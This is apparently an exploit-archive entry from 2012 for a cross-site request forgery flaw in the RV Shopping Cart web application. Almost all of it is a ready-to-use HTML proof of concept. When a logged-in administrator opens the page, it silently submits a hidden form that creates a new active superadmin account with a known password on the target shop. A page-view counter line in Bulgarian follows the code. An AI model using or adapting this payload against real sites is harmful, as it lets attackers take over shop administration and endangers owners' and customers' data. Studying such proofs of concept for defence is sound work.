# Exploit Title: RV Shopping cart CSRF Vulnerability # Date: 26/08/2012 # Author: DaOne (@LibyanCA) # Vendor: http://www.scripts4webmasters.com # Greetings to LCA # CSRF Add Admin <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[target]/rvp-admin/user-add.php"> <input type="hidden" name="user_id" value=""/> <input type="hidden" name="username" value="webadmin"> <input type="hidden" name="email" value="admin@email.com"> <input type="hidden" name="password" value="pass123"> <input type="hidden" name="group[]" value="1"/> <input type="hidden" name="active" value="1"/> <input type="hidden" name="superadmin" value="1"/> <input type="hidden" name="postnote" value=""/> <input type="hidden" name="save_user" value="Save"/> </form> </body> </html>Брой прочитания на тази страница: 808
RV Shopping Cart CSRF Vulnerability